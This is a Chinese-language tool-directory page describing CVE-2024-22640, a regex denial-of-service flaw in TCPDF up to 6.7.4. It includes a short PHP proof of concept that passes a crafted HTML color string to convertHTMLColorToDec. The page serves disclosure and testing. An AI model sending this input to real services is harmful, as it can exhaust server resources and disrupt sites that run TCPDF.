Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-22640 — CVE-2024-22640 的概念验证利用代码,该漏洞是 TCPDF <=6.7.4 中的一个 ReDoS 漏洞,由特制的 HTML 颜色输入触发,并附有演示代码。 | Kitploit
工具/GitHubGitHub/zunak/cve-2024-22640
静态分析漏洞分析代码分析漏洞利用Web安全模糊测试
GitHubzunak/cve-2024-22640

CVE-2024-22640

CVE-2024-22640 的概念验证利用代码,该漏洞是 TCPDF <=6.7.4 中的一个 ReDoS 漏洞,由特制的 HTML 颜色输入触发,并附有演示代码。

查看仓库
112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-22640

漏洞类型

正则表达式拒绝服务(ReDoS)

受影响产品及版本

TCPDF <= 6.7.4

攻击向量

TCPDF 在解析 HTML 颜色时包含精心构造的有效负载。

描述

TCPDF 版本 <= 6.7.4 在解析包含精心构造颜色的不可信 HTML 页面时,容易受到 ReDoS(正则表达式拒绝服务)攻击。

PoC

<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>

注意:在漏洞代码行之后使用 preg_last_error() 检查,正则表达式将以 PREG_BACKTRACK_LIMIT_ERROR 退出。

下载工具